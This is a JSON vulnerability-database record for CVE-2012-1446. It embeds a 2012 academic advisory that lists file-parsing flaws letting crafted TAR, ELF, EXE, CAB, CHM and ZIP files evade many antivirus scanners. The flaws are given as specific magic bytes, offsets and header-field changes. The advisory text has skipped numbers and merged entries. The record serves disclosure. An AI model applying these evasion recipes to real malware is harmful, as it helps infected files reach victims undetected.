]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The ELF file parser in Quick Heal (aka Cat QuickHeal) 11.00, McAfee Anti-Virus Scanning Engine 5.400.0.1158, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Norman Antivirus 6.06.12, eSafe 7.0.17.0, Kaspersky Anti-Virus 7.0.0.125, McAfee Gateway (formerly Webwasher) 2010.1C, Sophos Anti-Virus 4.61.0, CA eTrust Vet Antivirus 36.1.8511, Antiy Labs AVL SDK 2.0.3.7, PC Tools AntiVirus 7.0.3.5, Rising Antivirus 22.83.00.03, Fortinet Antivirus 4.2.254.0, and Panda Antivirus 10.0.2.7 allows remote attackers to bypass malware detection via an ELF file with a modified encoding field. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different ELF parser implementations. Multiple products ELF A file parser contains a vulnerability that can prevent malware detection. Different ELF If it is announced that there is also a problem with the parser implementation, this vulnerability can be CVE May be split.Changed by a third party encoding With field ELF Malware detection may be avoided via files. \nSuccessful exploits will allow attackers to bypass on-demand virus scanning, possibly allowing malicious files to escape detection. Multiple file-parsing vulnerabilities leading to evasion in different antivirus(AV) products. All \naffected products are command-line versions of \nthe AVs. \n\n----------------------------\nVulnerability Descriptions\n----------------------------\n\n1. Specially crafted infected POSIX TAR files with \"[aliases]\" as first 9 bytes \n evades detection. \n\n Affected products -\n ClamAV 0.96.4, CAT-QuickHeal 11.00\n \n CVE no - \n CVE-2012-1419\n\n2. Specially crafted infected POSIX TAR files with \"\\7fELF\" as first 4 bytes \n evades detection. \n\n Affected products -\n CAT-QuickHeal 11.00, Command 5.2.11.5, F-Prot 4.6.2.117, \n Fortinent 4.2.254.0, K7AntiVirus 9.77.3565, Kaspersky 7.0.0.125, \n Microsoft 1.6402, NOD32 5795, Norman 6.06.12, Panda 10.0.2.7, \n Rising 22.83.00.03\n\n CVE no - \n CVE-2012-1420\n\n3. Specially crafted infected POSIX TAR files with \"MSCF\" as first 4 bytes \n evades detection. \n\n Affected products -\n CAT-QuickHeal 11.00, Norman 6.06.12, Rising 22.83.00.03, \n Symantec 20101.3.0.103\n\n CVE no - \n CVE-2012-1421\n\n4. Specially crafted infected POSIX TAR files with \"ITSF\" as first 4 bytes \n evades detection. \n\n Affected products -\n CAT-QuickHeal 11.00, NOD32 5795, Norman 6.06.12, Rising 22.83.00.03\n\n CVE no - \n CVE-2012-1422\n\n5. Specially crafted infected POSIX TAR files with \"MZ\" as first 2 bytes \n evades detection. \n\n Affected products -\n Command 5.2.11.5, Emsisoft 5.1.0.1, F-Prot 4.6.2.117, Fortinent 4.2.254.0, \n Ikarus T3.1.1.97.0, K7AntiVirus 9.77.3565, NOD32 5795, Norman 6.06.12, \n PCTools 7.0.3.5, Rising 22.83.00.03, VirusBuster 13.6.151.0\n\n CVE no - \n CVE-2012-1423\n\n6. Specially crafted infected POSIX TAR files with \"\\19\\04\\00\\10\" at offset 8\n evades detection. \n\n Affected products -\n Antiy-AVL 2.0.3.7, CAT-QuickHeal 11.00, Jiangmin 13.0.900, Norman 6.06.12, \n PCTools 7.0.3.5, Sophos 4.61.0\n\n CVE no - \n CVE-2012-1424\n\n\n7. Specially crafted infected POSIX TAR files with \"\\50\\4B\\03\\04\" as the first\n 4 bytes evades detection. Specially crafted infected POSIX TAR files with \"\\42\\5A\\68\" as the first\n 3 bytes evades detection. \n\n Affected products -\n CAT-QuickHeal 11.00, Command 5.2.11.5, F-Prot 4.6.2.117, \n K7AntiVirus 9.77.3565, Norman 6.06.12, Rising 22.83.00.03\n\n CVE no - \n CVE-2012-1426\n\n\n9. Specially crafted infected POSIX TAR files with \"\\57\\69\\6E\\5A\\69\\70\" at \n offset 29 evades detection. \n\n Affected products -\n CAT-QuickHeal 11.00, Norman 6.06.12, Sophos 4.61.0\n\n CVE no - \n CVE-2012-1427\n\n10. Specially crafted infected POSIX TAR files with \"\\4a\\46\\49\\46\" at offset 6\n evades detection. \n \n Affected products -\n CAT-QuickHeal 11.00, Norman 6.06.12, Sophos 4.61.0\n\n CVE no - \n CVE-2012-1428\n\n11. Specially crafted infected ELF files with \"ustar\" at offset 257\n evades detection. \n\n Affected products -\n BitDefender 7.2, Comodo 7424, Emsisoft 5.1.0.1, eSafe 7.0.17.0, \n F-Secure 9.0.16160.0, Ikarus T3.1.1.97.0, McAfee 5.400.0.1158, \n McAfee-GW-Edition 2010.1C, nProtect 2011-01-17.01 \n\n CVE no - \n CVE-2012-1429\n12. Specially crafted infected ELF files with \"\\19\\04\\00\\10\" at offset 8 evades\n detection. \n\n Affected products -\n BitDefender 7.2, Comodo 7424, eSafe 7.0.17.0, F-Secure 9.0.16160.0, \n McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, nProtect 2011-01-17.01, \n Sophos 4.61.0, Rising 22.83.00.03\n\n CVE no - \n CVE-2012-1430\n13. Specially crafted infected ELF files with \"\\4a\\46\\49\\46\" at offset 6 evades\n detection. \n\n Affected products -\n BitDefender 7.2, Command 5.2.11.5, Comodo 7424, eSafe 7.0.17.0, \n F-Prot 4.6.2.117, F-Secure 9.0.16160.0, McAfee-GW-Edition 2010.1C, \n nProtect 2011-01-17.01, Sophos 4.61.0, Rising 22.83.00.03\n\n CVE no - \n CVE-2012-1431\n\n14. Specially crafted infected MS EXE files with \"\\57\\69\\6E\\5A\\69\\70\" at offset\n 29 evades detection. \n\n Affected products -\n Emsisoft 5.1.0.1, eSafe 7.0.17.0, Ikarus T3.1.1.97.0, Panda 10.0.2.7\n\n CVE no - \n CVE-2012-1432\n\n15. Specially crafted infected MS EXE files with \"\\4a\\46\\49\\46\" at offset\n 6 evades detection. \n\n Affected products -\n AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, eSafe 7.0.17.0, \n Ikarus T3.1.1.97.0, Panda 10.0.2.7\n\n CVE no - \n CVE-2012-1433\n\n16. Specially crafted infected MS EXE files with \"\\19\\04\\00\\10\" at offset\n 8 evades detection. \n\n Affected products -\n AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, Ikarus T3.1.1.97.0, \n Panda 10.0.2.7\n \n CVE no - \n CVE-2012-1434\n\n17. Specially crafted infected MS EXE files with \"\\50\\4B\\4C\\49\\54\\45\" at \n offset 30 evades detection. \n \n Affected products - \n AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, eSafe 7.0.17.0, \n Ikarus T3.1.1.97.0, Panda 10.0.2.7\n\n CVE no - \n CVE-2012-1435\n\n18. Specially crafted infected MS EXE files with \"\\2D\\6C\\68\" at \n offset 2 evades detection. \n \n Affected products - \n AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, eSafe 7.0.17.0, \n Ikarus T3.1.1.97.0, Panda 10.0.2.7\n\n CVE no - \n CVE-2012-1436\n\n19. Specially crafted infected MS Office files with \"\\50\\4B\\53\\70\\58\" at \n offset 526 evades detection. \n \n Affected products - \n Comodo 7425\n \n CVE no - \n CVE-2012-1437\n\n20. Specially crafted infected MS Office files with \"ustar\" at \n offset 257 evades detection. \n\n Affected products - \n Comodo 7425, Sophos 4.61.0 \n\n CVE no - \n CVE-2012-1438\n\n21. \u0027padding\u0027 field in ELF files is parsed incorrectly. \n If an infected ELF file\u0027s padding field is incremented by 1 it evades\n detection. \n\n Affected products - \n eSafe 7.0.17.0, Rising 22.83.00.03, Fortinet 4.2.254.0, Panda 10.0.2.7\n\n CVE no - \n CVE-2012-1439\n\n22. \u0027identsize\u0027 field in ELF files is parsed incorrectly. \n If an infected ELF file\u0027s identsize field is incremented by 1 it evades\n detection. \n\n Affected products - \n Norman 6.06.12, eSafe 7.0.17.0, eTrust-Vet 36.1.8511, Fortinet 4.2.254.0, \n Panda 10.0.2.7\n\n CVE no - \n CVE-2012-1440\n\n23. \u0027e_ip\u0027 and \u0027e_res\u0027 field in MS EXE files are parsed incorrectly. \n If any of these fields in an infected MS EXE file is incremented by 1 \n it evades detection. \n\n Affected products - \n Prevx 3.0\n\n \u0027e_minalloc\u0027, \u0027e_res2\u0027,\u0027e_cparhdr\u0027, \u0027e_crlc\u0027, \u0027e_lfarlc\u0027,\u0027e_maxalloc\u0027,\n \u0027e_oeminfo\u0027, \u0027e_ovno\u0027, \u0027e_cs\u0027, \u0027e_csum\u0027,\u0027e_sp\u0027, \u0027e_ss\u0027, \u0027e_cblp\u0027 and \n \u0027e_oemid\u0027 fields in MS EXE files are parsed incorrectly. \n If any of these fields in an infected MS EXE file is incremented by 1 \n it evades detection. \n\n Affected products - \n eSafe 7.0.017.0, Prevx 3.0\n\n\n CVE no - \n CVE-2012-1441\n\n24. \u0027class\u0027 field in ELF files is parsed incorrectly. \n If an infected ELF file\u0027s class field is incremented by 1 it evades\n detection. Infected RAR files with initial two bytes set to \u0027MZ\u0027 can be fixed by the \n user and correctly extracted. Such a file evades detection. \n \n Affected products -\n ClamAV 0.96.4, Rising 22.83.00.03, CAT-QuickHeal 11.00, GData 21, \n Symantec 20101.3.0.103, Command 5.2.11.5, Ikarus T3.1.1.97.0, \n Emsisoft 5.1.0.1, PCTools 7.0.3.5, F-Prot 4.6.2.117, \n VirusBuster 13.6.151.0, Fortinent 4.2.254.0, Antiy-AVL 2.0.3.7, \n K7AntiVirus 9.77.3565, TrendMicro-HouseCall 9.120.0.1004,Kaspersky 7.0.0.125 \n Jiangmin 13.0.900. Microsoft 1.6402, Sophos 4.61.0, NOD32 5795, AntiVir 7.11.1.163, \n Norman 6.06.12, McAfee 5.400.0.1158, Panda 10.0.2.7, McAfee-GW-Edition 2010.1C, \n TrendMicro 9.120.0.1004, Comodo 7424, BitDefender 7.2, eSafe 7.0.17.0, F-Secure 9.0.16160.0\n nProtect 2011-01-17.01, AhnLab-V3 2011.01.18.00, AVG 10.0.0.1190, Avast 4.8.1351.0, \n Avast5 5.0.677.0, VBA32 3.12.14.2 \n\n CVE no - \n CVE-2012-1443\n\n26. \u0027abiversion\u0027 field in ELF files is parsed incorrectly. \n If an infected ELF file\u0027s abiversion field is incremented by 1 it evades\n detection. \n\n Affected products - \n eSafe 7.0.017.0, Prevx 3.0, Fortinet 4.2.254.0, Panda 10.0.2.7\n\n CVE no - \n CVE-2012-1444\n\n27. \u0027abi\u0027 field in ELF files is parsed incorrectly. \n If an infected ELF file\u0027s abi field is incremented by 1 it evades\n detection. \n\n Affected products - \n eSafe 7.0.017.0, Rising 22.83.00.03, Fortinet 4.2.254.0, Panda 10.0.2.7\n\n CVE no - \n CVE-2012-1445\n\n28. \u0027e_version\u0027 field in ELF files is parsed incorrectly. \n If an infected ELF file\u0027s e_version field is incremented by 1 it evades\n detection. \n\n Affected products -\n Fortinet 4.2.254.0, eSafe 7.0.017.0, DrWeb 5.0.2.03300, Panda 10.0.2.7\n\n CVE no - \n CVE-2012-1447\n\n30. \u0027cbCabinet\u0027 field in CAB files is parsed incorrectly. \n If an infected CAB file\u0027s cbCabinet field is incremented by 1 it evades\n detection. \n\n Affected products -\n CAT-QuickHeal 11.00, TrendMicro 9.120.0.1004, Ikarus T3.1.1.97.0\n TrendMicro-HouseCall 9.120.0.1004, Emsisoft 5.1.0.1 \n\n CVE no - \n CVE-2012-1448\n\n31. \u0027vMajor\u0027 field in CAB files is parsed incorrectly. \n If an infected CAB file\u0027s vMajor field is incremented by 1 it evades\n detection. \n\n Affected products -\n NOD32 5795, Rising 22.83.00.03\n \n CVE no - \n CVE-2012-1449\n\n32. \u0027reserved3\u0027 field in CAB files is parsed incorrectly. \n If an infected CAB file\u0027s reserved field is incremented by 1 it evades\n detection. \n\n Affected products -\n Emsisoft 5.1.0.1, Sophos 4.61.0, Ikarus T3.1.1.97.0\n \n CVE no - \n CVE-2012-1450\n\n33. \u0027reserved2\u0027 field in CAB files is parsed incorrectly. \n If an infected CAB file\u0027s reserved2 field is incremented by 1 it evades\n detection. \n\n Affected products -\n Emsisoft 5.1.0.1, Ikarus T3.1.1.97.0\n \n CVE no - \n CVE-2012-1451\n\n34. \u0027reserved1\u0027 field in CAB files is parsed incorrectly. \n If an infected CAB file\u0027s reserved field is incremented by 1 it evades\n detection. \n\n Affected products -\n Emsisoft 5.1.0.1, Ikarus T3.1.1.97.0, CAT-QuickHeal 11.00\n \n CVE no - \n CVE-2012-1452\n\n35. \u0027coffFiles\u0027 field in CAB files is parsed incorrectly. \n If an infected CAB file\u0027s coffFiles field is incremented by 1 it evades\n detection. \u0027ei_version\u0027 field in ELF files is parsed incorrectly. \n If an infected ELF file\u0027s version field is incremented by 1 it evades\n detection. \n\n Affected products -\n McAfee 5.0.02.03300, eSafe 7.0.17.0, McAfee-GW-Edition 2010.1C, \n Rising 22.83.00.03, Fortinet 4.2.254.0, Panda 10.0.2.7\n\n CVE no - \n CVE-2012-1454\n\n37. \u0027vMinor\u0027 field in CAB files is parsed incorrectly. \n If an infected CAB file\u0027s version field is incremented by 1 it evades\n detection. \n\n Affected products -\n NOD32 5795, Rising 22.83.00.03\n \n CVE no - \n CVE-2012-1455\n\n38. A specially crafted ZIP file, created by concatenating the contents \n of a clean TAR archive and a virus-infected ZIP archive, is parsed \n incorrectly and evades detection. If the length field in the header of a file with test EICAR virus\n included into a TAR archive is set to be greater than the archive\u0027s total \n length (1,000,000+original length in our experiments), the antivirus \n declares the file to be clean but virus gets extracted correctly by the \n GNU tar program. \n\n Affected products -\n AntiVir 7.11.1.163, Antiy-AVL 2.0.3.7, Avast 4.8.1351.0, Avast5 5.0.677.0, \n AVG 10.0.0.1190, BitDefender 7.2, CAT-QuickHeal 11.00, ClamAV 0.96.4, \n Command 5.2.11.5, Emsisoft 5.1.0.1, eSafe 7.0.17.0, F-Prot 4.6.2.117, \n GData 21, Ikarus T3.1.1.97.0, Jiangmin 13.0.900, K7AntiVirus 9.77.3565, \n Kaspersky 7.0.0.125, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, \n Microsoft 1.6402, NOD32 5795, Norman 6.06.12, PCTools 7.0.3.5, \n Rising 22.83.00.03, Symantec 20101.3.0.103, TrendMicro 9.120.0.1004, \n TrendMicro-HouseCall 9.120.0.1004, VBA32 3.12.14.2, VirusBuster 13.6.151.0 \n\n CVE no - \n CVE-2012-1457\n\n40. A Windows Compiled HTML Help (CHM) file is a set of HTML files,\n scripts, and images compressed using the LZX algorithm. \n For faster random accesses, the algorithm is reset at intervals\n instead of compressing the entire file as a single stream. The\n length of each interval is specified in the LZXC header. \n\n If an infected CHM file\u0027s header modified so that the reset interval\n is lower than in the original file, the antivirus declares the file\n to be clean. But the Windows CHM viewer hh.exe correctly decompresses\n the infected content located before the tampered header. \n\n Affected products -\n ClamAV 0.96.4, Sophos 4.61.0 \n\n CVE no - \n CVE-2012-1458\n\n41. In a POSIX TAR archive, each member file has a 512-byte header protected\n by a simple checksum. Every header also contains a file length field, which\n is used by the extractor to locate the next header in the archive. \n\n If a TAR archive contains two files: the first one is clean, while\n the second is infected with test EICAR virus - and it is modified such that \n the length field in the header of the first, clean file to point into the \n middle of the header of the second, infected file. The antivirus declares \n the file to be clean but virus gets extracted correctly by the \n GNU tar program. If an infected tar.gz archive is appended 6 random bytes at the end, \n the antivirus declares the file to be clean but virus gets extracted by\n the gunzip+tar programs correctly by ignoring these bytes. \n\n Affected products -\n Antiy-AVL 2.0.3.7, CAT-QuickHeal 11.00, Command 5.2.11.5, \n eSafe 7.0.17.0, F-Prot 4.6.2.117, Jiangmin 13.0.900, \n K7AntiVirus 9.77.3565, VBA32 3.12.14.2 \n \n CVE no - \n CVE-2012-1460\n\n43. GZIP files can contain multiple compressed streams, which are assembled\n when the contents are extracted. If an infected ZIP archive is prepended with 1024 random bytes at the \n beginning, the antivirus declares the file to be clean but virus gets extracted\n by the unzip program correctly by skipping these bytes\n\n Affected products -\n AhnLab-V3 2011.01.18.00, AVG 10.0.0.1190, CAT-QuickHeal 11.00, \n Emsisoft 5.1.0.1, eSafe 7.0.17.0, Fortinent 4.2.254.0, Ikarus T3.1.1.97.0, \n Jiangmin 13.0.900, Kaspersky 7.0.0.125, Norman 6.06.12, Sophos 4.61.0, \n Symantec 20101.3.0.103 \n\n CVE no - \n CVE-2012-1462\n\n45. In most ELF files, the 5th byte of the header indicates endianness: 01\n for little-endian, 02 for bigendian. Linux kernel, however, does not\n check this field before loading an ELF file. If an infected ELF file\u0027s 5-th \n byte is set to 02, the antivirus declares the file to be clean but the ELF \n file gets executed correctly. \n\n Affected products -\n AhnLab-V3 2011.01.18.00, BitDefender 7.2, CAT-QuickHeal 11.00, Command 5.2.11.5, \n Comodo 7424, eSafe 7.0.17.0, F-Prot 4.6.2.117, F-Secure 9.0.16160.0, \n McAfee 5.400.0.1158, Norman 6.06.12, nProtect 2011-01-17.01, Panda 10.0.2.7 \n\n CVE no - \n CVE-2012-1463\n\n--------\nCredits\n--------\nVulnerabilities found and advisory written by Suman Jana and Vitaly Shmatikov. \n\n-----------\nReferences\n-----------\n\"Abusing File Processing in Malware Detectors for Fun and Profit\" by Suman Jana and Vitaly Shmatikov\nTo appear in IEEE Symposium on Security and Privacy 2012\nhttp://www.ieee-security.org/TC/SP2012/ \n",
"sources": [
{
"db": "NVD",
"id": "CVE-2012-1446"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001897"
},
{
"db": "BID",
"id": "52600"
},
{
"db": "VULHUB",
"id": "VHN-54727"
},
{
"db": "PACKETSTORM",
"id": "110990"
}
],
"trust": 2.07
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2012-1446",
"trust": 2.9
},
{
"db": "BID",
"id": "52600",
"trust": 1.4
},
{
"db": "OSVDB",
"id": "80431",
"trust": 1.1
},
{
"db": "OSVDB",
"id": "80426",
"trust": 1.1
},
{
"db": "OSVDB",
"id": "80427",
"trust": 1.1
},
{
"db": "OSVDB",
"id": "80428",
"trust": 1.1
},
{
"db": "OSVDB",
"id": "80430",
"trust": 1.1
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001897",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201203-410",
"trust": 0.7
},
{
"db": "BUGTRAQ",
"id": "20120319 EVASION ATTACKS EXPOLITING FILE-PARSING VULNERABILITIES IN ANTIVIRUS PRODUCTS",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-54727",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "110990",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-54727"
},
{
"db": "BID",
"id": "52600"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001897"
},
{
"db": "PACKETSTORM",
"id": "110990"
},
{
"db": "NVD",
"id": "CVE-2012-1446"
},
{
"db": "CNNVD",
"id": "CNNVD-201203-410"
}
]
},
"id": "VAR-201203-0370",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-54727"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T12:10:08.613000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "AVL SDK",
"trust": 0.8,
"url": "http://www.antiy.net/en/avlsdk.html"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.rising-global.com/"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.vet.com.au/"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.fortinet.com/"
},
{
"title": "MacAfee Scan Engine",
"trust": 0.8,
"url": "http://www.mcafee.com/us/support/support-eol-scan-engine.aspx"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.norman.com/"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.ps-japan.co.jp/"
},
{
"title": "PC Tools AntiVirus",
"trust": 0.8,
"url": "http://www.pctools.com/jp/spyware-doctor-antivirus/"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.quickheal.com/"
},
{
"title": "Endpoint Protection",
"trust": 0.8,
"url": "http://www.symantec.com/ja/jp/endpoint-protection"
},
{
"title": "eSafe",
"trust": 0.8,
"url": "http://www.aladdin.co.jp/esafe/"
},
{
"title": "Kaspersky Anti-Virus",
"trust": 0.8,
"url": "http://www.kaspersky.com/kaspersky_anti-virus"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.sophos.com"
},
{
"title": "McAfee Web Gateway",
"trust": 0.8,
"url": "http://www.mcafee.com/japan/products/web_gateway.asp"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2012-001897"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-264",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-54727"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001897"
},
{
"db": "NVD",
"id": "CVE-2012-1446"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/522005"
},
{
"trust": 1.7,
"url": "http://www.ieee-security.org/tc/sp2012/program.html"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/bid/52600"
},
{
"trust": 1.1,
"url": "http://osvdb.org/80426"
},
{
"trust": 1.1,
"url": "http://osvdb.org/80427"
},
{
"trust": 1.1,
"url": "http://osvdb.org/80428"
},
{
"trust": 1.1,
"url": "http://osvdb.org/80430"
},
{
"trust": 1.1,
"url": "http://osvdb.org/80431"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1446"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-1446"
},
{
"trust": 0.3,
"url": "http://www.antiy.net"
},
{
"trust": 0.3,
"url": "http://www.ca.com"
},
{
"trust": 0.3,
"url": "http://www.kaspersky.com/"
},
{
"trust": 0.3,
"url": "http://www.mcafee.com/"
},
{
"trust": 0.3,
"url": "http://anti-virus-software-review.toptenreviews.com/norman-review.html"
},
{
"trust": 0.3,
"url": "http://www.pandasecurity.com/usa/"
},
{
"trust": 0.3,
"url": "http://www.pctools.com/spyware-doctor-antivirus/"
},
{
"trust": 0.3,
"url": "http://www.quickheal.com/"
},
{
"trust": 0.3,
"url": "http://www.rising-global.com/"
},
{
"trust": 0.3,
"url": "http://www.sophos.com/"
},
{
"trust": 0.3,
"url": "http://www.symantec.com"
},
{
"trust": 0.3,
"url": "/archive/1/522005"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1419"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1439"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1426"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1429"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1436"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1440"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1432"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1438"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1428"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1446"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1443"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1444"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1441"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1421"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1430"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1434"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1435"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1424"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1431"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1425"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1423"
},
{
"trust": 0.1,
"url": "http://www.ieee-security.org/tc/sp2012/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1442"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1422"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1433"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1420"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1427"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1445"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1437"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-54727"
},
{
"db": "BID",
"id": "52600"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001897"
},
{
"db": "PACKETSTORM",
"id": "110990"
},
{
"db": "NVD",
"id": "CVE-2012-1446"
},
{
"db": "CNNVD",
"id": "CNNVD-201203-410"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-54727"
},
{
"db": "BID",
"id": "52600"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001897"
},
{
"db": "PACKETSTORM",
"id": "110990"
},
{
"db": "NVD",
"id": "CVE-2012-1446"
},
{
"db": "CNNVD",
"id": "CNNVD-201203-410"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-03-21T00:00:00",
"db": "VULHUB",
"id": "VHN-54727"
},
{
"date": "2012-03-20T00:00:00",
"db": "BID",
"id": "52600"
},
{
"date": "2012-03-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2012-001897"
},
{
"date": "2012-03-19T23:51:01",
"db": "PACKETSTORM",
"id": "110990"
},
{
"date": "2012-03-21T10:11:48.270000",
"db": "NVD",
"id": "CVE-2012-1446"
},
{
"date": "2012-03-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201203-410"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-07-28T00:00:00",
"db": "VULHUB",
"id": "VHN-54727"
},
{
"date": "2012-03-30T16:10:00",
"db": "BID",
"id": "52600"
},
{
"date": "2012-03-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2012-001897"
},
{
"date": "2012-07-28T03:30:35.210000",
"db": "NVD",
"id": "CVE-2012-1446"
},
{
"date": "2012-04-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201203-410"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201203-410"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple products ELF Vulnerability that prevents file parsers from detecting malware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2012-001897"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "permissions and access control",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201203-410"
}
],
"trust": 0.6
}
}
VAR-201203-0377
